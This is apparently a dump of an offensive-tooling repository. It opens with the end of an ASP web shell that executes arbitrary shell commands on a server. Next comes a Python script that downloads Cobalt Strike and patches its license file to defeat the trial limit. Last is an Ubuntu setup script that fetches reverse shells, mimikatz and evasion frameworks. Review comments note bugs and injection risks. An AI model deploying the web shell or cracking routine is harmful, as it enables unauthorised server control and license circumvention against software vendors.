& sztempfile, 0, true) 120 | set ofilelcx = fso.opentextfile (sztempfile, 1, false, 0) 121 | aaa=server.htmlencode(ofilelcx.readall) 122 | ofilelcx.close 123 | call fso.deletefile(sztempfile, true) 124 | si=si&"<text"&"area style='width:100%;height:440;' class='cmd'>" 125 | si=si&aaa 126 | si=si&chr(13)&"</text"&"area></form>" 127 | case "shell.application","shell.application.1" 128 | set seshell=server.createobject(request("cmdtype")) 129 | 130 | seshell.ShellExecute shellpath," /c " & defcmd & " > " & sztempfile,"","open",0 131 | si=si&"<iframe id=cmdResult src='?cmdtype=shellresult&Action=Cmd1Shell' style='width:100%;height:440;'>" 132 | case "shellresult" 133 | response.Clear() 134 | on error resume next 135 | jb "<body style=""background:#3F8805""><span style=""color:#FFFFFF"">" 136 | if fso.fileexists(sztempfile)=true then 137 | set ofilelcx = fso.opentextfile (sztempfile, 1, false, 0) 138 | ss=server.htmlencode(ofilelcx.readall) 139 | ss=replace(ss,vbnewline,"") 140 | jb ss 141 | ofilelcx.close 142 | call fso.deletefile(sztempfile, true) 143 | else 144 | jb "<meta http-equiv=""refresh"" content=""1"" />程序未结束,或者没有执行成功,等待刷新试试" 145 | end if 146 | if err then jb "<meta http-equiv=""refresh"" content=""1"" />程序未结束,或者没有执行成功,等待刷新试试" 147 | jb"</span></body>" 148 | response.end 149 | end select 150 | jb si 151 | function createmdb(path) 152 | si="" 153 | set c = createobject(obt(2,0)) 154 | c.create("provider=microsoft.jet.oledb.4.0;data source=" & path) 155 | set c = nothing 156 | if err.number=0 then 157 | si = si & path & "建立成功!" 
158 | end if 159 | si=si&backurl 160 | echo si 161 | end function 162 | %> 163 | -------------------------------------------------------------------------------- /py/cobaltstrike_update.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | 4 | # By DarkR4y 5 | import sys 6 | import os 7 | import platform 8 | import re 9 | import urllib2 10 | import time 11 | import subprocess 12 | import shutil 13 | from optparse import OptionParser 14 | 15 | current_path = os.getcwd() 16 | current_os = platform.system() 17 | if current_os == 'Darwin': 18 | cb_folder = 'Cobalt Strike' 19 | else: 20 | cb_folder = 'cobaltstrike' 21 | base_url = 'http://www.advancedpentest.com/' 22 | download_url = 'download' 23 | changelog_url = 'releasenotes.txt' 24 | search_str = '- Cobalt Strike' 25 | vpn_need_str = 'request a direct download' 26 | header = { "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre" } 27 | save_name = '' 28 | jar_path = '' 29 | temp_folder = 'cb_jar_temp' 30 | crack_keyword = '$life = 21;' 31 | crack_nag_keyword = 'This is a trial version of Cobalt Strike.\\nYou have $form left of your trial.\\n\\nIf you purchased Cobalt Strike. Run the\\nUpdate program and enter your license.' 

# get from http://stackoverflow.com/questions/2028517/python-urllib2-progress-hook
def chunk_report(bytes_so_far, chunk_size, total_size):
    """Print a single, carriage-return-overwritten download progress line.

    Args:
        bytes_so_far: bytes received so far.
        chunk_size: unused here; accepted so the signature matches the
            report_hook contract used by chunk_read.
        total_size: expected total length (taken from Content-Length).

    Raises:
        ZeroDivisionError: when total_size is 0 (empty response body).
    """
    percent = float(bytes_so_far) / total_size
    percent = round(percent*100, 2)
    # '\r' rewrites the same console line; the newline is only emitted once
    # the reported byte count reaches total_size.
    sys.stdout.write("Downloaded %d of %d bytes (%0.2f%%)\r" %
        (bytes_so_far, total_size, percent))

    if bytes_so_far >= total_size:
        sys.stdout.write('\n')

def chunk_read(response, save_path , chunk_size= 8 * 1024 , report_hook=None): #default is 8192
    """Stream a urllib2 response to save_path in chunk_size pieces.

    Args:
        response: object returned by urllib2.urlopen (Python 2 API:
            response.info().getheader is used).
        save_path: destination file, opened with 'wb' and truncated.
        chunk_size: read size per iteration (default 8192 bytes).
        report_hook: optional callable(bytes_so_far, chunk_size, total_size)
            invoked after every written chunk.

    Returns:
        Total bytes written, or None when an existing file of the same size
        is found and the download is skipped.

    Raises:
        AttributeError: if the server sent no Content-Length header
            (getheader returns None and .strip() fails).
        ValueError: if Content-Length is not an integer.
    """
    # NOTE(review): total_size is trusted as given by the remote server; the
    # loop below writes until EOF regardless of it, so a server can send more
    # than it announced and there is no size cap.
    total_size = response.info().getheader('Content-Length').strip()
    total_size = int(total_size)
    bytes_so_far = 0
    # insert
    # Skip only when a file of exactly the announced size already exists;
    # this is a size check, not an integrity check (no hash is compared).
    if os.path.exists(save_path):
        if os.path.getsize(save_path) == total_size:
            print '[***] Cobaltstrike already exists ...'
            return
    with open(save_path, 'wb') as fp:
        while True:
            chunk = response.read(chunk_size)

            # Adds 0 on the final empty read, so the break below is harmless.
            bytes_so_far += len(chunk)

            if not chunk:
                break
            fp.write(chunk)
            if report_hook:
                report_hook(bytes_so_far, chunk_size, total_size)

    return bytes_so_far


def http_down( url , save_path):
    """Download url to save_path with a spoofed Firefox 2 User-Agent.

    The socket timeout is 30 seconds. The result of chunk_read is discarded,
    so this function always returns None; callers that store its return value
    (see download_file) get None.

    NOTE(review): on Python 2 before 2.7.9 urllib2 does not validate TLS
    certificates, and nothing here verifies the downloaded archive (no
    checksum or signature), so the fetched binary is trusted as-is.
    """
    request = urllib2.Request(url)
    request.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 (FoxPlus) Firefox/2.0.0.14')
    response = urllib2.urlopen(request,timeout=30)
    #with open(save_path, 'wb') as fp:
        #shutil.copyfileobj(response, fp)
    chunk_read(response, save_path ,report_hook=chunk_report)

    pass


def http_get( url ):
    """Return the full response body of url as a str (30 s socket timeout).

    Uses the same spoofed User-Agent as http_down. The trailing `pass` is
    unreachable.
    """
    request = urllib2.Request(url)
    request.add_header('User-Agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.14) Gecko/20080404 (FoxPlus) Firefox/2.0.0.14')
    reader = urllib2.urlopen(request,timeout=30)
    return reader.read()
    pass

def month2int(m):
    """Map an English three-letter month abbreviation ('Jan'..'Dec') to 1..12.

    Case-sensitive. Any other input falls through every branch and returns
    None, which compare_date then compares with `>=`.
    """
    if m == 'Jan':
        return 1
    elif m == 'Feb':
        return 2
    elif m == 'Mar':
        return 3
    elif m == 'Apr':
        return 4
    elif m == 'May':
        return 5
    elif m == 'Jun':
        return 6
    elif m == 'Jul':
        return 7
    elif m == 'Aug':
        return 8
    elif m == 'Sep':
        return 9
    elif m == 'Oct':
        return 10
    elif m == 'Nov':
        return 11
    elif m == 'Dec':
        return 12
    pass



def WriteFile(file_read,file_apend , source_str , replace_str ):
    """Copy file_read to file_apend, replacing source_str with replace_str per line.

    The whole input is accumulated in memory (string concatenation per line)
    and written in one go; file_apend is truncated. Passing the same path for
    both (as cracknow does) works because the read loop finishes before the
    output file is opened.

    NOTE(review): if open(file_read) succeeds but anything raises before
    line `file_object_save = open(...)`, the finally clause hits an unbound
    file_object_save and raises NameError, masking the original error. The
    write is not atomic, so an interrupted run leaves a truncated file.
    """
    file_object_read = open(file_read, 'r')
    try:
        stringsave=""
        stringread=file_object_read.readline()
        while stringread:
            #print stringread
            stringread=stringread.replace(source_str, replace_str)
            #print 'shit - ' + stringread
            stringsave=stringsave+stringread
            stringread=file_object_read.readline()
        file_object_save = open(file_apend, 'w')
        file_object_save.write(stringsave)
    finally:
        file_object_read.close()
        file_object_save.close()


def cracknow():
    """Tamper with the trial-license script inside the unpacked jar.

    Rewrites temp_folder/scripts/license.sl in place: the line matched by the
    module-level crack_keyword is replaced with `$life = 9999;` and the nag
    text matched by crack_nag_keyword with a literal backslash-n marker string.
    crack_keyword, crack_nag_keyword and temp_folder are module globals not
    visible in this excerpt.

    NOTE(review): this is license tampering of a commercial product. For
    defenders, the replacement text `Cracked by DarkRay` / `www.blackh4t.org`
    embedded in scripts/license.sl is a reliable artifact for identifying
    jars produced by this tool.
    """
    # disables the trial-day limit by rewriting the license script
    license_file = temp_folder + os.sep + "scripts" + os.sep + "license.sl"
    WriteFile(license_file,license_file,crack_keyword,"$life = 9999;")
    WriteFile(license_file,license_file,crack_nag_keyword,'\\n Cracked by DarkRay \\n www.blackh4t.org \\n')
    pass

def my_exec(command , shell = None):
    """Run command through the system shell and report on stderr contents.

    Args:
        command: a single shell command string (always executed with
            shell=True).
        shell: despite its name, this is passed as Popen's `executable`,
            i.e. which shell binary runs the string (callers pass 'bash').

    Success is judged solely by stderr being empty; the exit status
    (p.returncode) is never checked and stdout is captured and dropped, so a
    failing command that prints nothing to stderr is reported as successful.

    NOTE(review): every caller builds `command` by string concatenation with
    current_path, cb_folder, temp_folder, jar_path and save_name, and
    save_name is derived from an href scraped from a remote page (see
    download_file). Shell metacharacters in any of those reach the shell
    unescaped, so a tampered download page or on-path modification of a
    plaintext fetch can lead to command injection on the host running this.
    """
    p=subprocess.Popen(command, shell=True, executable=shell ,stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdoutput , erroutput = p.communicate()
    if erroutput == '':
        print 'Exec command [ %s ] successful' % (command)
    else:
        print erroutput
    pass

def zip_file( plat ):
    """Re-zip temp_folder into cobaltstrike.jar and replace the original jar.

    The Darwin and Linux branches are identical: `cd current_path/temp_folder
    && zip -rq ../cobaltstrike.jar .` via bash, so the archive is written to
    current_path/cobaltstrike.jar; shutil.move then resolves the relative
    name 'cobaltstrike.jar' against the process cwd, which only matches if
    cwd == current_path (not verifiable from this excerpt). The original jar
    at jar_path is overwritten with no backup and temp_folder is deleted.
    The Windows branch is a no-op.
    """
    global jar_path
    if plat == 'Darwin': #macosx
        shit_cmd = 'cd ' + current_path + os.sep + temp_folder + ' && zip -rq ../cobaltstrike.jar .'
        my_exec(shit_cmd , 'bash')
        shutil.move('cobaltstrike.jar', jar_path)
        shutil.rmtree(temp_folder)
        print '[***] Replace the origin bin sueccssfully. done!'
    elif plat == 'Linux':
        shit_cmd = 'cd ' + current_path + os.sep + temp_folder + ' && zip -rq ../cobaltstrike.jar .'
        my_exec(shit_cmd,'bash')
        shutil.move('cobaltstrike.jar', jar_path)
        shutil.rmtree(temp_folder)
        print '[***] Replace the origin bin sueccssfully. done!'
        pass
    elif plat == 'Windows':
        pass

    pass

def extra_file( plat ):
    """Unpack the downloaded installer and extract its jar into temp_folder.

    Darwin: attaches the .dmg with hdiutil, copies the app bundle out of
    /Volumes/<cb_folder>, detaches, then unzips the jar found inside the
    .app bundle. Linux: `tar zxvf` the .tgz and unzip cb_folder/cobaltstrike.jar.
    Windows: no-op, so jar_path is left untouched. Sets the globals
    jar_path (both branches) and reads save_name, current_path, cb_folder,
    temp_folder from module scope.

    NOTE(review): `path` and `jar_path` are interpolated unquoted into the
    tar/unzip commands; a download name containing spaces or shell
    metacharacters breaks or subverts the command (see my_exec).
    """
    global save_name,jar_path
    path = current_path + os.sep + save_name
    if plat == 'Darwin' : #macosx

        shit_cmd = "cp -R \"/Volumes/" + cb_folder + os.sep + cb_folder + "\" \"" + current_path + os.sep + cb_folder + "\""
        my_exec("hdiutil attach " + path)
        my_exec(shit_cmd)
        my_exec("hdiutil detach \"/Volumes/" + cb_folder + "\" ")
        jar_path = current_path + os.sep + cb_folder + os.sep + "Cobalt Strike.app/Contents/Java/cobaltstrike.jar"
        shit_cmd = "unzip \"" + jar_path + "\" -d " + temp_folder
        my_exec(shit_cmd)
    elif plat == 'Linux': #Linux
        my_exec('tar zxvf ' + path)
        jar_path = current_path + os.sep + cb_folder + os.sep + "cobaltstrike.jar"
        my_exec('unzip ' + jar_path + ' -d ' + temp_folder)
        pass
    elif plat == 'Windows': #windows
        pass


    pass

def download_file( plat ):
    """Locate the platform-specific installer link on the download page and fetch it.

    Fetches base_url + download_url, aborts with sys.exit() when vpn_need_str
    is found in the page, otherwise takes the first href ending in 'zip' and
    swaps the extension to 'dmg' (Darwin) or 'tgz' (Linux) — assuming sibling
    artifacts exist under the same name — then downloads it to save_name,
    the last path segment of the URL (stored in the module global).

    NOTE(review): save_name is attacker-influenced remote content and later
    flows into shell commands (extra_file/my_exec). If no 'zip' href is found,
    start_time/end_time are never assigned, so the success branch raises
    NameError when a file named save_name already exists. down_res is always
    None because http_down returns nothing.
    """
    global save_name
    url = base_url + download_url
    res = http_get(url)
    m = re.search(vpn_need_str, res)
    if m is None:
        url_re = re.compile(r'href="(.+?)"')
        all_href = re.findall(url_re,res)
        #print all_href
        for i in all_href:
            if i[-3:] == 'zip':
                if plat == 'Darwin':
                    real_url = base_url + i[:-3] + 'dmg'
                elif plat == 'Linux':
                    real_url = base_url + i[:-3] + 'tgz'
                else:
                    real_url = base_url + i # Win version is zip
                print "[***] Get the real download url is %s ..." % real_url
                save_name = real_url.split('/')[-1]
                #print save_name
                start_time = time.time()
                down_res = http_down(real_url , save_name)
                end_time = time.time()
                break
        if os.path.exists(save_name):
            print '[***] Cobaltstrike download sueccssfully. total time cost: %ds' % (end_time - start_time)
        else:
            print '[***] Something is wrong ...'

    else:
        print '[***] You need download cobaltstrike via vpn from USA ...'
        sys.exit()
    pass

def get_local_version():
    """Parse the locally installed changelog for the first version line.

    Scans current_path/cb_folder/changelog_url line by line for search_str
    at a position other than 0; the text before it (minus one character) is
    taken as the release date and the text after it (minus the last two
    characters, presumably a CRLF — not verifiable here) as the version.

    Returns:
        (version, realse_date) as str, or None (implicit) when the file
        does not exist.

    Raises:
        UnboundLocalError: if no line matches, since `version` is only
            bound inside the loop.
    """
    fname = current_path + os.sep + cb_folder + os.sep + changelog_url
    if os.path.isfile(fname):
        f = open(fname,'rb')
        for line in f:
            pos = [m.start() for m in re.finditer(search_str, line)]
            if pos != [0] and pos != []:
                realse_date = line[:pos[0] - 1 ]
                version = line[pos[0] + len(search_str): -2]
                print "current version is [%s], release date is [ %s ]" % (version , realse_date)
                break
        f.close()
        return version,realse_date
        pass
    else:
        print '[***] Wrong cobaltstrike path ...'

def get_update_version():
    """Fetch the remote changelog and parse it the same way as get_local_version.

    The body is written to 'tmp.txt' relative to the process cwd, re-read,
    and then current_path/tmp.txt is removed — the two paths coincide only
    when cwd == current_path, otherwise os.remove raises OSError and the
    temporary file is left behind.

    Returns:
        (version, realse_date) as str.

    Raises:
        UnboundLocalError: if no line matches search_str.
    """
    print '[***] Fetching remote version ,plz wait ...'
    url = base_url + changelog_url
    res = http_get(url)
    f = open('tmp.txt','wb')
    f.write(res)
    f.close()
    fr = open('tmp.txt','rb')
    for line in fr:
        pos = [m.start() for m in re.finditer(search_str, line)]
        if pos != [0] and pos != []:
            realse_date = line[:pos[0] - 1 ]
            version = line[pos[0] + len(search_str): -2]
            print "update version is [%s], release date is [ %s ]" % (version , realse_date)
            break
    fr.close()
    os.remove(current_path + os.sep + 'tmp.txt')
    return version,realse_date
    pass

def install():
    """Full pipeline: download, unpack, tamper with the license, re-zip.

    Runs for current_os (module global). The cracknow step modifies the
    vendor jar; see its docstring.
    """
    print '[***] Searching the cobaltstrike download url ...'
    download_file(current_os)
    extra_file(current_os)
    cracknow()
    zip_file(current_os)
    pass


def compare_date( date1 , date2):
    """Return True when date1 is on or after date2; dates are 'D Mon YYYY'.

    Only the month is converted to an int (month2int); day and year are
    compared as strings, so e.g. '9' >= '10' is True lexicographically.
    Paths that do not reach `return True` or `return False` return None,
    which update() treats as "not newer" (it checks `== True`).

    NOTE(review): the source was recovered from a whitespace-collapsed dump,
    so which `if` the `else` belongs to could not be verified; it is
    attached to the innermost test here.
    """
    d1,m1,y1 = date1.split(' ')
    d2,m2,y2 = date2.split(' ')
    m1 = month2int(m1)
    m2 = month2int(m2)
    if y1 >= y2:
        if m1 >= m2:
            if d1 >= d2:
                return True
            else:
                return False

    pass

def update():
    """Install only when the remote version/date is newer than the local one.

    Versions are compared with float(), so non-numeric version strings raise
    ValueError, and a None from get_local_version raises TypeError on unpack.
    """
    old_v , old_date = get_local_version()
    new_v , new_date = get_update_version()
    if float(old_v) > float(new_v):
        print '[***] Nothing to update ...'
    elif float(old_v) == float(new_v):
        if compare_date(old_date , new_date) == True: # old_date > new_date
            print '[***] Nothing to update ...'
        else:
            install()
    else:
        install()
    pass

''' Main Entry '''
def main(argv=None): #
    """Parse -i/--install, -u/--update, -c/--crack and dispatch.

    `argv` is accepted but unused: OptionParser reads sys.argv. Only
    --install and --update are acted on; --crack is parsed and then ignored.
    """
    parser = OptionParser()
    parser.add_option("-i", "--install", action="store_true",
                      dest="install",
                      default=False,
                      help="install cobaltstrike to current folder")
    parser.add_option("-u", "--update", action="store_true",
                      dest="update",
                      default=False,
                      help="update cobaltstrike")
    parser.add_option("-c", "--crack", action="store_true",
                      dest="crack",
                      default=False,
                      help="just crack the cobaltstrike!")

    (options, args) = parser.parse_args()

    if options.install==True:
        print '[***] Cobalt Strike Installer'
        install()

    if options.update ==True:
        print '[***] Cobalt Strike Updater'
        update()





if __name__ == "__main__":
    main()

--------------------------------------------------------------------------------
/sh/pentest4ubuntu.sh:
--------------------------------------------------------------------------------
#!/bin/sh
#origin from - https://www.z3ncode.net/?p=55 | modifiedy by darkr4y

echo
"preliminary questions regarding user-rights"
# NOTE(review): this script runs apt-get, writes under /usr/share/lightdm and
# runs `make install`, so it appears to assume it is executed as root (only
# the skipfish step uses sudo). There is no `set -e` / `set -u`: a failed
# download, clone or extraction is silently skipped and the following steps
# keep going from whatever directory the last `cd` reached.
cd ~/
clear
# $myname and $mydirectory are taken verbatim from the prompt and used
# unquoted throughout (mkdir ~/$mydirectory, chown -R $myname:$myname ...);
# "no slashes pls" is the only input validation.
read -p "Please enter your username, this will help me fix permissions:" myname
clear

echo "what would be your prefered directory name for the tools? no slashes pls"
cd ~/
clear
read -p "Please enter the directory name you would like:" mydirectory
clear

#echo "integrated firewall activation"
#ufw enable

echo "system updates"
apt-get update -y
apt-get upgrade -y
apt-get dist-upgrade -y

echo "removal of default useless apps."
apt-get remove -y --purge rhythmbox ekiga totem* ubuntu-one* unity-lens-music unity-lens-friends unity-lens-photos unity-lens-video transmission* thunderbird* apport

echo "removal of NSA PRISM search tools provided by unity."
gsettings set com.canonical.Unity.Lenses disabled-scopes "['more_suggestions-amazon.scope', 'more_suggestions-u1ms.scope', 'more_suggestions-populartracks.scope', 'music-musicstore.scope', 'more_suggestions-ebay.scope', 'more_suggestions-ubuntushop.scope', 'more_suggestions-skimlinks.scope']"
gsettings set com.canonical.Unity.Lenses remote-content-search none

echo "disable guest user and remote logon"
# Two lightdm drop-in files: disable the greeter's remote-login option and
# the guest session. Written via sh -c so the redirection runs as root.
sh -c 'printf "[SeatDefaults]\ngreeter-show-remote-login=false\n" >/usr/share/lightdm/lightdm.conf.d/50-no-remote-login.conf'
sh -c 'printf "[SeatDefaults]\nallow-guest=false\n" >/usr/share/lightdm/lightdm.conf.d/50-no-guest.conf'

echo "installation of normal hacking tools and other ubuntu goodies for laptops"
apt-get install -y nmap nbtscan wireshark tcpdump openjdk-6-jre openjdk-7-jre openvpn ettercap-text-only ghex pidgin pidgin-otr traceroute lft gparted autopsy subversion git gnupg htop ssh libimage-exiftool-perl aptitude p7zip-full proxychains curl terminator irssi gnome-tweak-tool libtool build-essential bum rdesktop sshfs bzip2 extundelete gimp iw ldap-utils ntfs-3g samba-common samba-common-bin steghide whois python-dev libpcap-dev aircrack-ng gnome-screenshot eog bundler ruby1.9.1 ruby1.9.1-dev libssl1.0.0 libssl-dev laptop-mode-tools python-nfqueue python-scapy openconnect libgmp3-dev libpcap-dev gengetopt byacc flex cmake libpcre3-dev libidn11-dev ophcrack gdb stunnel socat libcurl4-openssl-dev chromium-browser swftools hping3 tcpreplay tcpick python-setuptools gufw vncviewer python-urllib3 libnss3-1d libxss1 scalpel foremost unrar rar secure-delete vmfs-tools

echo "installation of other tools"
apt-get install -y gstreamer1.0-plugins-bad qemu-kvm qemu-utils qemu-common aqemu gvfs-fuse xdg-user-dirs gnome-applets* powertop flashplugin-installer unity-tweak-tool

echo "installation of googlechrome"
# NOTE(review): from here on every archive, jar, .deb and .exe is fetched
# with wget and unpacked, dpkg -i'd or built + `make install`ed without any
# checksum or signature verification, and many URLs are plain http://
# (android sdk, skullsecurity, portswigger, pentestmonkey, ampliasecurity,
# gentilkiwi, subgraph, hashcat, sourceforge mirrors, oxid.it, ollydbg,
# hex-rays). Anything served or modified in transit lands on the host with
# root privileges. Pin versions and verify published hashes before trusting
# what ends up in ~/$mydirectory. The googlecode.com URLs below have not
# worked since Google Code hosting was retired.
wget -nc https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
dpkg -i google-chrome-stable_current_amd64.deb
rm google-chrome-stable_current_amd64.deb

echo "create default tools directory"
mkdir ~/$mydirectory
cd ~/$mydirectory/
mkdir ~/$mydirectory/cheatsheets
mkdir ~/$mydirectory/exploits
cd ~/$mydirectory/exploits

echo "installation of android sdk"
mkdir ~/$mydirectory/mobile
cd ~/$mydirectory/mobile
wget -nc http://dl.google.com/android/android-sdk_r22.6-linux.tgz
tar -xvf android-sdk_r22.6-linux.tgz
rm -rf android-sdk_r22.6-linux.tgz
cd ~/$mydirectory



echo "gather the metasploit repository"
cd ~/$mydirectory/exploits
git clone https://github.com/rapid7/metasploit-framework.git
cd ~/$mydirectory/exploits/metasploit-framework

echo "installation of metasploit requirements"
apt-get install -y build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre subversion git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev ruby1.9.3 nmap

echo "installation of metasploit required gems"
# Unpinned gems; `bundle install` runs the Gemfile of whatever commit the
# clone above happened to fetch.
gem install wirble sqlite3 bundler rake
bundle install

echo "wordlists gathering"
cd ~/
mkdir ~/$mydirectory/wordlists
cd ~/$mydirectory/wordlists
wget -nc http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2

echo "install burp"
cd ~/$mydirectory
mkdir ~/$mydirectory/webapps
mkdir ~/$mydirectory/webapps/burp_proxy
cd ~/$mydirectory/webapps/burp_proxy
wget -nc http://portswigger.net/burp/burpsuite_free_v1.6.jar
cd ~/$mydirectory

echo "install cookie cadger"
mkdir ~/$mydirectory/network
mkdir ~/$mydirectory/network/sidejacking
cd ~/$mydirectory/network/sidejacking
wget -nc https://www.cookiecadger.com/files/CookieCadger-1.06.jar
cd ~/$mydirectory

echo "install enum4linux"
mkdir ~/$mydirectory/network/enum4linux
cd ~/$mydirectory/network/enum4linux
# The only wget without -nc; a re-run downloads a second copy as *.1.
wget https://labs.portcullis.co.uk/download/enum4linux-0.8.9.tar.gz
tar -xvf enum4linux-0.8.9.tar.gz
rm -rf enum4linux-0.8.9.tar.gz
cd ~/$mydirectory

echo "install torbrowser"
#darknet tor
mkdir ~/$mydirectory/network/torbrowser
cd ~/$mydirectory/network/torbrowser
wget -nc https://www.torproject.org/dist/torbrowser/3.5/tor-browser-linux64-3.5_en-US.tar.xz
tar -xvf tor-browser-linux64-3.5_en-US.tar.xz
rm -rf tor-browser-linux64-3.5_en-US.tar.xz
cd ~/$mydirectory

echo "gathering phpreverseshell"
mkdir ~/$mydirectory/network/reverse_shells
cd ~/$mydirectory/network/reverse_shells
wget -nc http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xvf ~/$mydirectory/network/reverse_shells/php-reverse-shell-1.0.tar.gz
rm -rf ~/$mydirectory/network/reverse_shells/php-reverse-shell-1.0.tar.gz
cd ~/$mydirectory

#wcedigest
# NOTE(review): wce and mimikatz below are credential-dumping tools that most
# AV/EDR products detect on sight; on a managed host expect these downloads to
# be quarantined and an alert raised, and expect the plaintext http fetch to be
# the first thing a proxy log shows.
echo "install wcedigest"
mkdir ~/$mydirectory/escalation
mkdir ~/$mydirectory/escalation/wcedigest
cd ~/$mydirectory/escalation/wcedigest
wget -nc http://www.ampliasecurity.com/research/wce_v1_3beta.tgz
tar -xvf wce_v1_3beta.tgz
rm -rf wce_v1_3beta.tgz
cd ~/$mydirectory

#mimikatz
echo "install mimikatz"
mkdir ~/$mydirectory/escalation/mimikatz
cd ~/$mydirectory/escalation/mimikatz
wget -nc http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
unzip -o mimikatz_trunk.zip
rm -rf mimikatz_trunk.zip
cd ~/$mydirectory

#memory forensics tools
echo "install volatility framework"
mkdir ~/$mydirectory/forensics
mkdir ~/$mydirectory/forensics/volatility
cd ~/$mydirectory/forensics/volatility
wget -nc https://volatility.googlecode.com/files/volatility-2.3.1.tar.gz
cd ~/$mydirectory/forensics/volatility
tar -xvf volatility-2.3.1.tar.gz
rm -rf volatility-2.3.1.tar.gz
cd ~/$mydirectory

#recon dns
echo "install DNSmap"
mkdir ~/$mydirectory/recon
mkdir ~/$mydirectory/recon/dnsmap
cd ~/$mydirectory/recon/dnsmap
wget -nc https://dnsmap.googlecode.com/files/dnsmap-0.30.tar.gz
tar -xvf dnsmap-0.30.tar.gz
rm -rf dnsmap-0.30.tar.gz
cd ~/$mydirectory


#webapp vulnerability assessors
echo "install subgraph vega"
mkdir ~/$mydirectory/webapps/vega
cd ~/$mydirectory/webapps/vega
wget -nc http://subgraph.com/downloads/VegaBuild-linux.gtk.x86_64.zip
unzip -o VegaBuild-linux.gtk.x86_64.zip
rm -rf VegaBuild-linux.gtk.x86_64.zip
cd ~/$mydirectory

echo "install oclhashcat"
mkdir ~/$mydirectory/pwcracking
mkdir ~/$mydirectory/pwcracking/oclhashcat
cd ~/$mydirectory/pwcracking/oclhashcat
wget -nc http://hashcat.net/files/oclHashcat-1.01.7z
# NOTE(review): `p7z` does not appear to be a command provided by p7zip-full
# (it ships 7z/7za/7zr and p7zip); this line most likely fails and the
# following rm deletes the archive before anything was extracted.
p7z oclHashcat-1.01.7z
rm -rf oclHashcat-1.01.7z
cd ~/$mydirectory

echo "install cryptohaze multiforcer needs opencl"
mkdir ~/$mydirectory/pwcracking/cryptohaze_multiforcer
cd ~/$mydirectory/pwcracking/cryptohaze_multiforcer
wget -nc "http://downloads.sourceforge.net/project/cryptohaze/New-Multiforcer-Linux_x64_1_31.tar.bz2?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcryptohaze%2Ffiles%2F&ts=1391475227&use_mirror=superb-dca2" -O New-Multiforcer-Linux_x64_1_31.tar.bz2
# NOTE(review): the decompressor is bunzip2, not `bunzip`, and `-o2` is not a
# bunzip2 flag; tar -xvf below would handle the .bz2 on its own anyway.
bunzip -o2 New-Multiforcer-Linux_x64_1_31.tar.bz2
tar -xvf New-Multiforcer-Linux_x64_1_31.tar.bz2
rm -rf New-Multiforcer-Linux_x64_1_31.tar.bz2
cd ~/$mydirectory

#Multiple web-backdoors
echo "install fuzzdb"
mkdir ~/$mydirectory/webapps/fuzzdb
cd ~/$mydirectory/webapps/fuzzdb
svn checkout http://fuzzdb.googlecode.com/svn/trunk/ fuzzdb-read-only
cd ~/$mydirectory

#web-app tools
# The git clones below fetch the default branch head with no tag or commit
# pinned, so two runs of this script can yield different code.
echo "install sqlmap and other tools from github"
cd ~/$mydirectory/webapps
git clone https://github.com/vs4vijay/heartbleed.git
git clone https://github.com/beefproject/beef
git clone https://github.com/Arachni/arachni.git
cd ~/$mydirectory/webapps/arachni
bundle install
cd ~/$mydirectory/webapps
git clone https://github.com/wpscanteam/wpscan.git
git clone https://github.com/sullo/nikto.git
git clone https://github.com/gabtremblay/tachyon.git
git clone https://github.com/sqlmapproject/sqlmap.git
cd ~/$mydirectory

#tools for social engineering
mkdir ~/$mydirectory/social_engineering
cd ~/$mydirectory/social_engineering
git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd ~/$mydirectory

#tools for mitm/network (yersinia to test)
cd ~/$mydirectory/network/
git clone https://github.com/DanMcInerney/creds.py.git
git clone https://github.com/nccgroup/vlan-hopping.git
git clone https://github.com/tomac/yersinia.git
git clone https://github.com/Hood3dRob1n/Reverser.git
cd ~/$mydirectory

#VulnDB
mkdir ~/$mydirectory/vulndb
cd ~/$mydirectory/vulndb
git clone https://github.com/toolswatch/vFeed.git
cd ~/$mydirectory

#all the exploits from exploit-db
cd ~/$mydirectory/exploits
git clone https://github.com/offensive-security/exploit-database
cd ~/$mydirectory

#tools for privescalation
cd ~/$mydirectory/escalation
git clone https://github.com/pentestgeek/smbexec.git
git clone https://github.com/rebootuser/LinEnum.git
cd ~/$mydirectory

#framework veil ASM
cd ~/$mydirectory/exploits
git clone https://github.com/Veil-Framework/Veil-Evasion.git

#tools for mitm lan
cd ~/$mydirectory/network
git clone https://github.com/DanMcInerney/LANs.py.git
git clone https://github.com/SpiderLabs/Responder.git
cd ~/$mydirectory

#recon
cd ~/$mydirectory/recon
git clone https://github.com/hatRiot/clusterd.git
cd ~/$mydirectory

#cheatsheets
cd ~/$mydirectory/cheatsheets
git clone https://github.com/aramosf/sqlmap-cheatsheet.git
cd ~/$mydirectory

#portscanners
cd ~/$mydirectory/network
# NOTE(review): git:// is an unauthenticated, unencrypted transport, and the
# result is compiled and installed system-wide as root three lines later.
git clone git://github.com/zmap/zmap.git
cd ~/$mydirectory/network/zmap
cmake -DENABLE_HARDENING=ON
make
make install
cd ~/$mydirectory

#tools to ident hash
mkdir ~/$mydirectory/crypto
cd ~/$mydirectory/crypto
git clone https://github.com/SmeegeSec/HashTag.git
cd ~/$mydirectory

#tools for passthehash
cd ~/$mydirectory/network
git clone https://github.com/inquisb/keimpx
cd ~/$mydirectory

#tools for mitm vlan hop
# vlan-hopping was already cloned into network/ above; this second clone
# fails with "destination path already exists" and is ignored.
cd ~/$mydirectory/network
git clone https://github.com/nccgroup/vlan-hopping.git
cd ~/$mydirectory

#tools for portscanning
cd ~/$mydirectory/network
git clone https://github.com/robertdavidgraham/masscan.git
cd ~/$mydirectory

